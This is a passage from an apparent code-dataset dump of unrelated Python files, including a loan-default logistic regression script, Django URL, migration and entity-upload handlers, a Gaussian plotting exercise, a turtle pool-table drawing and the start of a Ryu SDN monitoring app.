age_data.groupby('YEARS_BINNED').mean()\r\nage_groups\r\n\r\n\r\nplt.figure(figsize = (8, 8))\r\n\r\n# Graph the age bins and the average of the target as a bar plot\r\nage_groups.TARGET.plot(kind='bar')\r\n# Plot labeling\r\nplt.xticks(rotation = 75); plt.xlabel('Age Group (years)'); plt.ylabel('Failure to Repay (%)')\r\nplt.title('Failure to Repay by Age Group');\r\n\r\n\r\n# Extract the EXT_SOURCE variables and show correlations\r\next_data = application_train[['TARGET', 'EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'DAYS_BIRTH']]\r\next_data_corrs = ext_data.corr()\r\next_data_corrs\r\n\r\n\r\nplt.figure(figsize = (8, 6))\r\n\r\n# Heatmap of correlations\r\nsns.heatmap(ext_data_corrs, cmap = plt.cm.RdYlBu_r, vmin = -0.25, annot = True, vmax = 0.6)\r\nplt.title('Correlation Heatmap');\r\n\r\n\r\nplt.figure(figsize = (10, 12))\r\n\r\n# iterate through the sources\r\n#for i, source in enumerate(['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']):\r\n \r\n # create a new subplot for each source\r\n # plt.subplot(3, 1, i + 1)\r\n # plot repaid loans\r\n # sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, source], label = 'target == 0')\r\n # plot loans that were not repaid\r\n # sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, source], label = 'target == 1')\r\n \r\n # Label the plots\r\n #plt.title('Distribution of %s by Target Value' % source)\r\n # plt.xlabel('%s' % source); plt.ylabel('Density');\r\n \r\n#plt.tight_layout(h_pad = 2.5)\r\n\r\n# Groupby the client id (SK_ID_CURR), count the number of previous loans, and rename the column\r\nprevious_loan_counts = bureau.groupby('SK_ID_CURR', as_index=False)['SK_ID_BUREAU'].count().rename(columns = {'SK_ID_BUREAU': 'previous_loan_counts'})\r\n\r\napplication_train = application_train.merge(previous_loan_counts, on = 'SK_ID_CURR', how = 'left')\r\n\r\napplication_test = application_test.merge(previous_loan_counts, on = 'SK_ID_CURR', how = 
'left')\r\n\r\n\r\n# Fill the missing values with 0 \r\napplication_train['previous_loan_counts'] = application_train['previous_loan_counts'].fillna(0)\r\n\r\n# Plots the distribution of a variable colored by value of the target\r\ndef kde_target(var_name, df):\r\n    \r\n    # Calculate the correlation coefficient between the new variable and the target\r\n    corr = df['TARGET'].corr(df[var_name])\r\n    \r\n    # Calculate medians for repaid vs not repaid\r\n    avg_repaid = df.loc[df['TARGET'] == 0, var_name].median()\r\n    avg_not_repaid = df.loc[df['TARGET'] == 1, var_name].median()\r\n    \r\n    plt.figure(figsize = (12, 6))\r\n    \r\n    # Plot the distribution for target == 0 and target == 1\r\n    sns.kdeplot(df.loc[df['TARGET'] == 0, var_name], label = 'TARGET == 0')\r\n    sns.kdeplot(df.loc[df['TARGET'] == 1, var_name], label = 'TARGET == 1')\r\n    \r\n    # label the plot\r\n    plt.xlabel(var_name); plt.ylabel('Density'); plt.title('%s Distribution' % var_name)\r\n    plt.legend();\r\n    \r\n    # print out the correlation\r\n    print('The correlation between %s and the TARGET is %0.4f' % (var_name, corr))\r\n    # Print out average values\r\n    print('Median value for loan that was not repaid = %0.4f' % avg_not_repaid)\r\n    print('Median value for loan that was repaid = %0.4f' % avg_repaid)\r\n    \r\n    \r\nkde_target('EXT_SOURCE_1', application_train)\r\nkde_target('EXT_SOURCE_2', application_train)\r\nkde_target('EXT_SOURCE_3', application_train)\r\n\r\n\r\nkde_target('previous_loan_counts', application_train)\r\n\r\n# 'bureau_DAYS_CREDIT_mean' only exists after the bureau aggregations below are\r\n# merged in, so calling this here would raise a KeyError:\r\n# kde_target('bureau_DAYS_CREDIT_mean', application_train)\r\n\r\n\r\n#Function for Numeric Aggregations\r\n\r\ndef agg_numeric(df, group_var, df_name):\r\n    \"\"\"Aggregates the numeric values in a dataframe. This can\r\n    be used to create features for each instance of the grouping variable.\r\n    \r\n    Parameters\r\n    --------\r\n        df (dataframe): \r\n            the dataframe to calculate the statistics on\r\n        group_var (string): \r\n            the variable by which to group df\r\n        df_name (string): \r\n            the variable used to rename the columns\r\n        \r\n    Return\r\n    --------\r\n        agg (dataframe): \r\n            a dataframe with the statistics aggregated for \r\n            all numeric columns. Each instance of the grouping variable will have \r\n            the statistics (mean, min, max, sum; currently supported) calculated. 
\r\n The columns are also renamed to keep track of features created.\r\n \r\n \"\"\"\r\n # Remove id variables other than grouping variable\r\n for col in df:\r\n if col != group_var and 'SK_ID' in col:\r\n df = df.drop(col, axis=1)\r\n \r\n group_ids = df[group_var]\r\n numeric_df = df.select_dtypes(include=['number'])\r\n numeric_df[group_var] = group_ids\r\n\r\n # Group by the specified variable and calculate the statistics\r\n agg = numeric_df.groupby(group_var).agg(['count', 'mean', 'max', 'min', 'sum']).reset_index()\r\n\r\n # Need to create new column names\r\n columns = [group_var]\r\n\r\n # Iterate through the variables names\r\n for var in agg.columns.levels[0]:\r\n # Skip the grouping variable\r\n if var != group_var:\r\n # Iterate through the stat names\r\n for stat in agg.columns.levels[1][:-1]:\r\n # Make a new column name for the variable and stat\r\n columns.append('%s_%s_%s' % (df_name, var, stat))\r\n\r\n agg.columns = columns\r\n return agg\r\n\r\n\r\n\r\n# Function to calculate correlations with the target for a dataframe\r\ndef target_corrs(df):\r\n\r\n # List of correlations\r\n corrs = []\r\n\r\n # Iterate through the columns \r\n for col in df.columns:\r\n print(col)\r\n # Skip the target column\r\n if col != 'TARGET':\r\n # Calculate correlation with the target\r\n corr = df['TARGET'].corr(df[col])\r\n\r\n # Append the list as a tuple\r\n corrs.append((col, corr))\r\n \r\n # Sort by absolute magnitude of correlations\r\n corrs = sorted(corrs, key = lambda x: abs(x[1]), reverse = True)\r\n \r\n return corrs\r\n\r\n\r\n#Function to Handle Categorical Variables\r\n\r\ndef count_categorical(df, group_var, df_name):\r\n \"\"\"Computes counts and normalized counts for each observation\r\n of `group_var` of each unique category in every categorical variable\r\n \r\n Parameters\r\n --------\r\n df : dataframe \r\n The dataframe to calculate the value counts for.\r\n \r\n group_var : string\r\n The variable by which to group the dataframe. 
For each unique\r\n value of this variable, the final dataframe will have one row\r\n \r\n df_name : string\r\n Variable added to the front of column names to keep track of columns\r\n\r\n \r\n Return\r\n --------\r\n categorical : dataframe\r\n A dataframe with counts and normalized counts of each unique category in every categorical variable\r\n with one row for every unique value of the `group_var`.\r\n \r\n \"\"\"\r\n \r\n # Select the categorical columns\r\n categorical = pd.get_dummies(df.select_dtypes(include=['object']))\r\n\r\n # Make sure to put the identifying id on the column\r\n categorical[group_var] = df[group_var]\r\n\r\n # Groupby the group var and calculate the sum and mean\r\n categorical = categorical.groupby(group_var).agg(['sum', 'mean'])\r\n \r\n column_names = []\r\n \r\n # Iterate through the columns in level 0\r\n for var in categorical.columns.levels[0]:\r\n # Iterate through the stats in level 1\r\n for stat in ['count', 'count_norm']:\r\n # Make a new column name\r\n column_names.append('%s_%s_%s' % (df_name, var, stat))\r\n \r\n categorical.columns = column_names\r\n \r\n return categorical\r\n\r\n\r\n#Bureau Data\r\n# Group by the client id, calculate aggregation statistics\r\nbureau_agg_new = agg_numeric(bureau.drop('SK_ID_BUREAU',axis=1), group_var = 'SK_ID_CURR', df_name = 'bureau')\r\nbureau_agg_new.head()\r\n\r\napplication_train = application_train.merge(bureau_agg_new, on = 'SK_ID_CURR', how = 'left')\r\n\r\napplication_test = application_test.merge(bureau_agg_new, on = 'SK_ID_CURR', how = 'left')\r\n\r\n\r\nbureau_counts = count_categorical(bureau, group_var = 'SK_ID_CURR', df_name = 'bureau')\r\nbureau_counts.head()\r\n\r\n\r\napplication_train = application_train.merge(bureau_counts, left_on = 'SK_ID_CURR', right_index = True, how = 'left')\r\n\r\napplication_test = application_test.merge(bureau_counts, left_on = 'SK_ID_CURR', right_index = True, how = 'left')\r\n\r\n\r\napplication_train.shape\r\n\r\napplication_test.shape\r\n\r\n#Value counts of Bureau Balance dataframe by loan\r\n\r\nbureau_balance_counts = count_categorical(bureau_balance, group_var = 'SK_ID_BUREAU', df_name = 'bureau_balance')\r\nbureau_balance_counts.head()\r\n\r\nbureau_balance_agg = agg_numeric(bureau_balance, group_var = 'SK_ID_BUREAU', df_name = 'bureau_balance')\r\nbureau_balance_agg.head()\r\n\r\n\r\n# Dataframe grouped by the loan\r\nbureau_by_loan = bureau_balance_agg.merge(bureau_balance_counts, right_index = True, left_on = 'SK_ID_BUREAU', how = 'outer')\r\n\r\n# Merge to include the SK_ID_CURR\r\nbureau_by_loan = bureau[['SK_ID_BUREAU', 'SK_ID_CURR']].merge(bureau_by_loan, on = 'SK_ID_BUREAU', how = 'left')\r\n\r\n# Aggregate the stats for each client\r\nbureau_balance_by_client = agg_numeric(bureau_by_loan.drop('SK_ID_BUREAU', axis=1), group_var = 'SK_ID_CURR', df_name = 'client')\r\n\r\n\r\napplication_train = application_train.merge(bureau_balance_by_client, on = 'SK_ID_CURR', how = 'left')\r\n\r\napplication_test = application_test.merge(bureau_balance_by_client, on = 'SK_ID_CURR', how = 'left')\r\n\r\n\r\nmissing_train = missing_values_table(application_train)\r\nmissing_train.head(20)\r\n\r\n\r\n\r\nmissing_train_vars = list(missing_train.index[missing_train['% of Total Values'] > 90])\r\nlen(missing_train_vars)\r\n\r\n#Aligning test and train data\r\n\r\ntrain_labels = application_train['TARGET']\r\n\r\n# Align the dataframes, this will remove the 'TARGET' column\r\napplication_train, application_test = application_train.align(application_test, join = 
'inner', axis = 1)\r\n\r\napplication_train['TARGET'] = train_labels\r\n\r\n\r\n\r\nmissing_test = missing_values_table(application_test)\r\nmissing_test.head(20)\r\n\r\nmissing_test_vars = list(missing_test.index[missing_test['% of Total Values'] > 90])\r\nlen(missing_test_vars)\r\n\r\n\r\napplication_train.to_csv('train_bureau_raw.csv', index = False)\r\napplication_test.to_csv('test_bureau_raw.csv', index = False)\r\n\r\n\r\n#Missing value treatment\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler, Imputer\r\n\r\n# Drop the target from the training data\r\nif 'TARGET' in application_train:\r\n    train = application_train.drop('TARGET',axis=1)\r\nelse:\r\n    train = application_train.copy()\r\n    \r\n# Feature names\r\nfeatures = list(train.columns)\r\n\r\n# Copy of the testing data\r\ntest = application_test.copy()\r\n\r\n# Median imputation of missing values\r\nimputer = Imputer(strategy = 'median')\r\n\r\n# Scale each feature to 0-1\r\nscaler = MinMaxScaler(feature_range = (0, 1))\r\n\r\n# Fit on the training data\r\nimputer.fit(train)\r\n\r\n# Transform both training and testing data\r\ntrain = imputer.transform(train)\r\ntest = imputer.transform(test)\r\n\r\n# Repeat with the scaler\r\nscaler.fit(train)\r\ntrain = scaler.transform(train)\r\ntest = scaler.transform(test)\r\n\r\nprint('Training data shape: ', train.shape)\r\nprint('Testing data shape: ', test.shape)\r\n\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n# Make the model with the specified regularization parameter\r\nlog_reg = LogisticRegression(C = 0.0001)\r\n\r\n# Train on the training data\r\nlog_reg.fit(train, train_labels)\r\n\r\n\r\n# Make predictions\r\nlog_reg_pred = log_reg.predict_proba(test)[:, 1]\r\n\r\n\r\n\r\n# Submission dataframe\r\nsubmit = application_test[['SK_ID_CURR']]\r\nsubmit['TARGET'] = log_reg_pred\r\n\r\nsubmit.head()","sub_path":"logistic regression model.py","file_name":"logistic regression model.py","file_ext":"py","file_size_in_byte":18305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"206135626","text":"from django.conf.urls import url, include\nfrom django.views import generic\nfrom django.urls import path\n\nurlpatterns = [\n\n    url(r'^$', generic.RedirectView.as_view(\n        url='/api/', permanent=False)),\n\n    path(r'api/documents/', include('lmsinno.documents.documents_urls')),\n\n    path(r'api/copies/', include('lmsinno.copies.copies_urls')),\n\n    path(r'api/tags/', include('lmsinno.tags.tags_urls')),\n\n    path(r'api/users/', include('lmsinno.users.users_urls')),\n\n    path(r'api/', include('lmsinno.orders.orders_urls')),\n\n    path(r'api/', include('lmsinno.api_documentation.api_documentation_urls'))\n]\n","sub_path":"server/lmsinno/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"47582380","text":"#!/usr/bin/python\n\"\"\"\n(C) Copyright - 2016 by Tiamo Laitakari\nTiamo.Laitakari@helsinki.fi\n\nAll rights reserved.\n\n\nRuns Hawkeye and works as an API bridge for JAVA.\n\"\"\"\n\nimport hawkeye.hawkconfig\nfrom hawkeye.lib import lsof\nfrom hawkeye.lib import ps\n\n\ndef __main__():\n    lsof_rc = lsof.lsof().run_lsof()\n    ps_rc = ps.ps().run_ps()\n\n    if lsof_rc != 0 or ps_rc != 0:\n        raise AttributeError(\"This is really bad!\")\n\nif __name__ == \"__main__\":\n    
__main__()\n","sub_path":"hawkeye/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"231701815","text":"import random\r\nimport pylab\r\nimport scipy.integrate\r\n\r\n\r\ndef gaussian(x, mu, sigma):\r\n factor1 = 1/(sigma*((2*pylab.pi)**0.5))\r\n factor2 = pylab.e**-(((x-mu)**2)/(2*sigma**2))\r\n return factor1 * factor2\r\n\r\nx_vals = []\r\ny_vals = []\r\nsigma = 1\r\nmu = 0\r\nx = -4\r\nwhile x <= 4:\r\n x_vals.append(x)\r\n y_vals.append(gaussian(x, mu, sigma))\r\n x += 0.05\r\npylab.plot(x_vals, y_vals)\r\npylab.title('Normal distribution. Sigma = ' + str(sigma) + ', mu = ' + str(mu))\r\npylab.show()\r\n\r\n\r\ndef check_empirical(num_trials):\r\n for n in range(num_trials):\r\n mu = random.randint(-10, 10)\r\n sigma = random.randint(1, 10)\r\n print('For mu =', mu, 'sigma =', sigma)\r\n for num_std in (1, 1.96, 3):\r\n area = scipy.integrate.quad(gaussian, mu - num_std * sigma, mu + num_std * sigma, (mu, sigma))[0]\r\n print(' Fraction within', num_std, 'std =', area)\r\n\r\n\r\ncheck_empirical(3)","sub_path":"MIT 6.0002/Confidence Intervals/Gauss.py","file_name":"Gauss.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445027839","text":"import os.path\nimport uuid\nfrom eledata import util\nfrom eledata.serializers.entity import EntityDetailedSerializer\nfrom eledata.models.entity import Entity\nfrom eledata.util import string_caster, HandlerError\nfrom eledata.core_engine.provider import EngineProvider\nfrom project.settings import CONSTANTS\n\n\nclass EntityViewSetHandler(object):\n def __init__(self):\n pass\n\n @staticmethod\n def select_entity(entity):\n if entity is None:\n return None\n\n serializer = EntityDetailedSerializer(entity)\n return serializer.data\n\n @staticmethod\n def get_entity_list(processing_list, completed_list):\n # retrieving list of constant entity\n # TODO: move status to constant/ utils, add the intermediate status\n constant_list = list(CONSTANTS.ENTITY.ENTITY_TYPE)\n for x in constant_list:\n if x['value'] in [y.type for y in completed_list]:\n x['status'] = 'ready'\n elif x['value'] in [y.type for y in processing_list]:\n x['status'] = 'processing'\n else:\n x['status'] = 'pending'\n return constant_list\n\n @staticmethod\n def create_entity(request_data, request_file, group, verifier):\n verifier.verify(1, request_data)\n # The dir that the uploaded data file will be saved to.\n # Appending the original filename to the end so that the new\n # filename has the same extension, while also making the filename\n # more recognizable.\n filename = \"temp/\" + str(uuid.uuid4()) + \".\" + str(request_file)\n\n with open(filename, \"w\") as fi:\n fi.write(request_file.read())\n # Parsing the entity JSON passed in into a dictionary\n entity_dict = util.from_json(request_data[\"entity\"])\n # del entity_dict['update_mechanism']\n\n entity_dict[\"source\"] = {\n \"file\": {\"filename\": filename,\n \"is_header_included\": request_data[\"isHeaderIncluded\"]}}\n\n entity_dict['state'] = 1\n verifier.verify(2, entity_dict)\n\n # TODO: calculate draft of data summary here?\n entity_data = util.file_to_list_of_dictionaries(\n open(entity_dict[\"source\"][\"file\"][\"filename\"]),\n numLines=100,\n is_header_included=util.string_caster[\"bool\"](\n entity_dict[\"source\"][\"file\"][\"is_header_included\"]))\n\n entity_dict['temp_data'] = 
entity_data\n entity_dict['temp_header'] = CONSTANTS.ENTITY.HEADER_OPTION.get(entity_dict[\"type\"].upper())\n serializer = EntityDetailedSerializer(data=entity_dict)\n verifier.verify(3, serializer)\n\n entity = serializer.create(serializer.validated_data)\n entity.group = group\n entity.save()\n\n response_data = {\n 'entity_id': str(entity.id),\n 'data': entity_data,\n 'header_option': CONSTANTS.ENTITY.HEADER_OPTION.get(entity_dict[\"type\"].upper())\n }\n # Saving the serializer while also adding its id to the response\n # Loading the first 100 lines of data from the request file\n # Passing header option from constants file\n\n return response_data\n\n @staticmethod\n def create_entity_mapped(request_data, verifier, pk, group):\n entity = Entity.objects.get(pk=pk)\n verifier.verify(0, request_data, entity, pk)\n verifier.verify(1, entity, group)\n verifier.verify(2, request_data['data_header'], entity.source.file.filename)\n\n # We will create a dummy entity whose only purpose is to serialize the\n # two fields we give it, so we can add them to the actual entity. The\n # dummy starts as a dictionary and then becomes an Entity.\n raw_dummy = {'data_header': request_data['data_header']}\n\n assert os.path.isfile(entity.source.file.filename)\n data = util.file_to_list_of_dictionaries(\n open(entity.source.file.filename, 'r'),\n is_header_included=entity.source.file.is_header_included)\n\n # Changing the user created field names in data to the new mapped names\n try:\n for item in data:\n for mapping in raw_dummy['data_header']:\n item[mapping[\"mapped\"]] = item[mapping[\"source\"]]\n # Avoid deleting data when mapped is source\n if mapping[\"mapped\"] != mapping[\"source\"]:\n del item[mapping[\"source\"]]\n\n # Casting everything in data from strings to their proper data type\n # according to request.data['data_header']\n for item in data:\n for mapping in raw_dummy['data_header']:\n item[mapping[\"mapped\"]] = \\\n string_caster[mapping[\"data_type\"]](item[mapping[\"mapped\"]])\n\n except KeyError as e:\n # TODO: do logging against e\n raise HandlerError('mappingError')\n except ValueError as e:\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n # Generating Entity Summary and Chart Summary after mapping is confirmed.\n summary_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Summary\",\n group=group,\n params=None,\n entity_data=data,\n entity_type=entity.type)\n chart_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Chart\",\n group=group,\n params=None,\n entity_data=data,\n entity_type=entity.type)\n performance_chart_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.PerformanceChart\",\n group=group,\n params=None,\n entity_data=data,\n entity_type=entity.type)\n try:\n summary_entity_stats_engine.execute()\n chart_entity_stats_engine.execute()\n performance_chart_entity_stats_engine.execute()\n except ValueError as e:\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n # TODO: generate create entity audit\n # TODO: use mongoengine aggregate to do data_summary\n\n raw_dummy['data_summary'] = summary_entity_stats_engine.get_processed()\n raw_dummy['data_summary_chart'] = chart_entity_stats_engine.get_processed()\n raw_dummy['data_performance_chart'] = performance_chart_entity_stats_engine.get_processed()\n\n dummy_serializer = EntityDetailedSerializer(data=raw_dummy)\n verifier.verify(3, dummy_serializer)\n dummy = Entity(**dummy_serializer.validated_data)\n\n # Adding the dummy's 
fields to the actual entity\n entity.add_change(data)\n entity.data_header = dummy.data_header\n entity.data_summary = dummy.data_summary\n entity.data_summary_chart = dummy.data_summary_chart\n entity.data_performance_chart = dummy.data_performance_chart\n\n os.remove(entity.source.file.filename)\n entity.source.file = None\n entity.state = 2\n entity.save()\n\n # TODO: this is the pain point for h2o testing to be extremely slow\n entity.save_data_changes()\n group.update_analysis_question_enable()\n\n response_data = {\n 'entity_summary': raw_dummy['data_summary'],\n 'data': data[:100],\n 'header_option': CONSTANTS.ENTITY.HEADER_OPTION.get(entity.type.upper())\n }\n return response_data\n\n @staticmethod\n def entity_data_update(request_data, request_file, pk, group):\n entity = Entity.objects(pk=pk, group=group)\n\n filename = \"temp/\" + str(uuid.uuid4()) + \".\" + str(request_file)\n with open(filename, \"w\") as fi:\n fi.write(request_file.read())\n\n # Parsing the entity JSON passed in into a dictionary\n entity_dict = util.from_json(request_data[\"entity\"])\n\n entity_data = util.file_to_list_of_dictionaries(\n open(filename),\n numLines=100,\n is_header_included=request_data[\"isHeaderIncluded\"])\n\n # Parsing the entity JSON passed in into a dictionary\n entity.update_one(set__source__file__filename=filename,\n set__source__file__is_header_included=request_data[\"isHeaderIncluded\"],\n set__source__update_mechanism=entity_dict['update_mechanism'],\n set__state=3,\n set__temp_data=entity_data\n )\n\n # Reload changed entity\n updated_entity = Entity.objects(pk=pk, group=group).first()\n updated_entity.reload()\n\n response_data = {\n 'entity_id': str(updated_entity.id),\n 'data': entity_data,\n 'header_option': CONSTANTS.ENTITY.HEADER_OPTION.get(updated_entity.type.upper())\n }\n # Loading the first 100 lines of data from the request file\n # Passing header option from constants file\n\n return response_data\n\n @staticmethod\n def entity_date_update_stage2(verifier, pk, group):\n entity = Entity.objects(pk=pk).first()\n\n # We will create a dummy entity whose only purpose is to serialize the\n # two fields we give it, so we can add them to the actual entity. 
The\n # dummy starts as a dictionary and then becomes an Entity.\n data_header = entity.data_header\n\n assert os.path.isfile(entity.source.file.filename)\n data = util.file_to_list_of_dictionaries(\n open(entity.source.file.filename, 'r'),\n is_header_included=entity.source.file.is_header_included)\n\n # Changing the user created field names in data to the new mapped names\n try:\n for item in data:\n for mapping in data_header:\n item[mapping[\"mapped\"]] = item[mapping[\"source\"]]\n # Avoid deleting data when mapped is source\n if mapping[\"mapped\"] != mapping[\"source\"]:\n del item[mapping[\"source\"]]\n\n # Casting everything in data from strings to their proper data type\n # according to request.data['data_header']\n for item in data:\n for mapping in data_header:\n item[mapping[\"mapped\"]] = \\\n string_caster[mapping[\"data_type\"]](item[mapping[\"mapped\"]])\n except KeyError as e:\n print(e.message)\n # TODO: do logging against e\n raise HandlerError('mappingError')\n except ValueError as e:\n print(e.message)\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n is_replace = False if entity.source.update_mechanism == 'incremental' else True\n entity.add_change(data, replace=is_replace)\n entity.save_data_changes()\n\n # Generating Entity Summary and Chart Summary after mapping is confirmed.\n summary_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Summary\",\n group=group,\n params=None,\n entity_data=entity.data,\n entity_type=entity.type)\n chart_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Chart\",\n group=group,\n params=None,\n entity_data=entity.data,\n entity_type=entity.type)\n try:\n summary_entity_stats_engine.execute()\n chart_entity_stats_engine.execute()\n except ValueError as e:\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n os.remove(entity.source.file.filename)\n\n Entity.objects(pk=pk).update_one(\n set__data_summary=summary_entity_stats_engine.get_processed(),\n set__data_summary_chart=chart_entity_stats_engine.get_processed(),\n set__source__file=None,\n set__state=2\n )\n entity.reload()\n\n return {\"msg\": \"Updated successful\"}\n\n @staticmethod\n def remove_stage1_entity(request_data, verifier, group):\n\n verifier.verify(0, request_data)\n verifier.verify(1, request_data)\n\n entity = Entity.objects.get(group=group, type=request_data['entity_type'])\n\n verifier.verify(2, entity)\n\n entity.delete()\n\n return {\"msg\": \"Remove successful\"}\n\n @staticmethod\n def rollback_stage3_entity(pk, verifier, group):\n\n entity = Entity.objects(pk=pk, group=group)\n\n entity.update_one(set__state=2)\n\n # Reload changed entity\n Entity.objects(pk=pk, group=group).first().reload()\n\n return {\"msg\": \"Rollback successful\"}\n","sub_path":"eledata/handlers/create_entity.py","file_name":"create_entity.py","file_ext":"py","file_size_in_byte":12847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501793413","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('buscador', '0014_auto_20150901_1619'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bodegas',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('nombre', models.CharField(max_length=30)),\n ('direccion', models.CharField(max_length=200)),\n ('coorx', 
models.FloatField(default=0)),\n                ('coory', models.FloatField(default=0)),\n                ('telefono', models.IntegerField(default=0)),\n                ('ciudad', models.ForeignKey(to='buscador.Ciudad')),\n                ('departamento', models.ForeignKey(to='buscador.Departamento')),\n            ],\n            options={\n                'ordering': ['nombre'],\n            },\n        ),\n    ]\n","sub_path":"buscador/migrations/0015_bodegas.py","file_name":"0015_bodegas.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"353182420","text":"# James Cooper, 15 November 2018, Pool Table Turtle Lab\r\n\r\nfrom turtle import *\r\n\r\ns = Turtle() # \r\nt = Turtle() # global turtle variables\r\nf = Turtle() #\r\ntex = Turtle()#\r\n\r\ntitle(\"Pool Table\") # Title of program in top bar \r\nbgcolor(\"black\") # Set background color to black\r\n\r\nspeed(0) # Set turtle speed to maximum speed\r\n\r\nt.ht() # \r\nf.ht() # \r\ntex.ht() # global hiding of turtles in the wild, the predators have come out\r\ns.ht() # \r\n\r\ndef bounce_horizontal(): # Defining function that sets the ball parameters and sends it horizontally\r\n    \r\n    t.color(\"white\") #section to draw ball\r\n    t.pu() # Pen up for turtle so a line is not drawn\r\n    t.shape(\"circle\") # Draws a circle\r\n    t.shapesize(2,2) # Set shape parameters\r\n    t.setpos(0,0) # Sets position\r\n    t.st() # Shows the turtle\r\n    delay(25) # Delay of movement when working with whole program\r\n    t.goto(282,0) # Moves ball from start position to new position - causes movement\r\n\r\ndef tableout(): # Defining a function that will draw the table and my name\r\n\r\n    f.color(\"#84391b\") # Set color of shape to brown\r\n    f.pu() # Pen up for turtle so a line is not drawn\r\n    f.shape(\"square\") # Draws a square\r\n    f.fillcolor(\"#84391b\") # Set color of shape filling to brown\r\n    f.shapesize(20,32,25) # Set shape parameters\r\n    f.setpos(0,0) # Set turtle position to the origin\r\n    f.st() # Shows the turtle\r\n    \r\n    s.color(\"green\") # Set color of shape to green\r\n    s.pu() # Pen up for turtle so a line is not drawn\r\n    s.shape(\"square\") # Draws a square\r\n    s.fillcolor(\"green\") # Set color of shape filling to green\r\n    s.shapesize(17,29,25) # Set shape parameters\r\n    s.setpos(0,0) # Set turtle position to the origin\r\n    s.st() # Shows the turtle\r\n\r\n    tex.color(\"white\") # Setting turtle color to white\r\n    tex.pu() # Pen up for turtle so a line is not drawn\r\n    tex.setpos(590,-400) # Setting turtle coordinates\r\n    tex.write(\"- James Cooper\",align = \"left\",font = (\"Arial\",20,\"normal\")) # Writing my name\r\n    \r\ndef bounce_diag(): # Defining a function that will move the ball diagonally to a point\r\n    \r\n    t.st() # Shows the turtle\r\n    delay(30) # Sets delay of movement\r\n    t.goto(0,162) # Tells turtle to move to a point\r\n    \r\ndef bounce_vert(): # Defining a function that will move the ball vertically to a point\r\n\r\n    t.st() # Shows the turtle\r\n    delay(35) # Sets delay of movement\r\n    t.goto(0,-72) # Tells turtle to move to a point\r\n    \r\ndef main(): # Defining a single function that calls everything in order\r\n    tableout() # \r\n    bounce_horizontal()# Calling of functions in order of movement and purpose\r\n    bounce_diag() # \r\n    bounce_vert() # \r\n    \r\nmain() # Calling the main function\r\n","sub_path":"pooltableturtle_Cooper_James.py","file_name":"pooltableturtle_Cooper_James.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"345228202","text":"# Copyright (C) 2015 Research and Education 
Advanced Network New Zealand Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport time\nimport os\nimport signal\n\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller import dpset\nfrom ryu.controller import event\nfrom ryu.controller.handler import MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\n\nfrom config_parser import watcher_parser\nfrom util import kill_on_exception, get_sys_prefix, get_logger, dpid_log\nfrom watcher import watcher_factory\n\n\nclass EventGaugeReconfigure(event.EventBase):\n pass\n\nclass Gauge(app_manager.RyuApp):\n \"\"\"Ryu app for polling Faucet controlled datapaths for stats/state.\n\n It can poll multiple datapaths. The configuration files for each datapath\n should be listed, one per line, in the file set as the environment variable\n GAUGE_CONFIG. It logs to the file set as the environment variable\n GAUGE_LOG,\n \"\"\"\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n _CONTEXTS = {'dpset': dpset.DPSet}\n\n logname = 'gauge'\n exc_logname = logname + '.exception'\n\n def __init__(self, *args, **kwargs):\n super(Gauge, self).__init__(*args, **kwargs)\n sysprefix = get_sys_prefix()\n self.config_file = os.getenv(\n 'GAUGE_CONFIG', sysprefix + '/etc/ryu/faucet/gauge.yaml')\n self.exc_logfile = os.getenv(\n 'GAUGE_EXCEPTION_LOG',\n sysprefix + '/var/log/ryu/faucet/gauge_exception.log')\n self.logfile = os.getenv(\n 'GAUGE_LOG', sysprefix + '/var/log/ryu/faucet/gauge.log')\n\n # Setup logging\n self.logger = get_logger(\n self.logname, self.logfile, logging.DEBUG, 0)\n # Set up separate logging for exceptions\n 